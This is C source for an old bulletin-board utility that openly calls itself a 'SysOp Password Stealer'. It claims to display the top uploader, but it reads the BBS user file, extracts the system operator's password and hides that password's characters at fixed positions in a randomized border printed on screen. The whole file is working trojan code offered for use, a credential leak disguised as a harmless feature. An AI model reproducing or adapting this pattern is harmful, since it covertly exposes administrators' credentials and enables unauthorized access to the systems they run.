/**************************************************************************/
/** SysOp Password Stealer vl.0 by Swinging Man                          **/
/** Prints top uploader.....but also reveals SysOp's password            **/
/** in the boarder                                                       **/
/**************************************************************************/
#include <stdio.h>
#include <ctype.h>
#include <time.h>

struct userdata {               /* 232 bytes */

/* Since I hacked this out, there are still many */
/* unknown areas of the record             */

  char name[31];                /*user's name */
  char pass[9];                 /*user's password */
  char from[30];                /*user's FROM field */
  char fone[13];                /*phone number field */
  unsigned short number;        /*user number */
  unsigned short level;         /* level */
  unsigned short type;          /*type of ratio */
  unsigned short ratio;         /*ratio of DLs to one UL */
  unsigned short computer;      /*computer type */
  unsigned short posts;         /*number of posts */
  char unknown0[40];
  char base[10];                /*conference access */
  unsigned int unknown_num0;
  unsigned int unknown_num1;
  unsigned int unknown_num2;
  unsigned int used;            /*seconds used today */
  unsigned int time1;           /*time per day */
  unsigned int time2;           /*clone of above */
  unsigned int bytesdn;         /*bytes downloaded */
  unsigned int bytesup;         /*bytes uploaded */
  unsigned int bytelimit;       /*bytes avail per day */
  unsigned int unknown_num3;
  char unknown1[46];
};
FILE *fp;
struct list {
  char name[40];
  unsigned int bytes_uploaded;
  struct list *next;
};

char rnd()
{
  char c;
  c = (char) rand();
  while (!(isalpha(c)) || (c < 20))
    c = (char) rand();
  return (c);
}

main()
{

  int x, y;

  struct userdata user;
  struct list head;
  struct list *temp, *temp2;

  char password[9];

  char border[31];
  char middle[31] = "##                          ##";

  head.next = NULL;

  if ((fp = fopen("bbs:user.data", "r")) == NULL) {
    printf("Can't Open User File\n");
    return 1;
  }

/*get all users and put in list*/
  while (fread((void *) &user, sizeof(struct userdata), 1, fp) == 1) {
    if (user.number == 1)
      strcpy(password, user.pass);
    if ((user.level < 200) && (user.level > 0) && (user.bytesdn > 0)) {
      temp = (struct list *) malloc(sizeof(struct list));
      if (temp == NULL) {
        printf("Out of Memory!\n");
        exit(1);
      }
      strcpy(temp->name, user.name);
      temp->bytes_uploaded = user.bytesup;
      temp2 = &head;
      while ((temp2->next != NULL)
             && ((temp2->next->bytes_uploaded) > (temp->bytes_uploaded))) {
        temp2 = temp2->next;
      }
      temp->next = temp2->next;
      temp2->next = temp;
    }
  }
  fclose(fp);
  temp = head.next;
  srand((unsigned int) time(NULL));
  y = 0;
  for (x = 0; x < 30; x++)
    border[x] = rnd();
  border[30] = '\0';
  printf("%s\n", border);
  strncpy(&middle[15 - (strlen(temp->name) / 2)], temp->name,
          strlen(temp->name));
  printf("%s\n", middle);
  for (x = 1; x < 30; x += 4)
    border[x] = password[y++];
  printf("%s\n", border);
}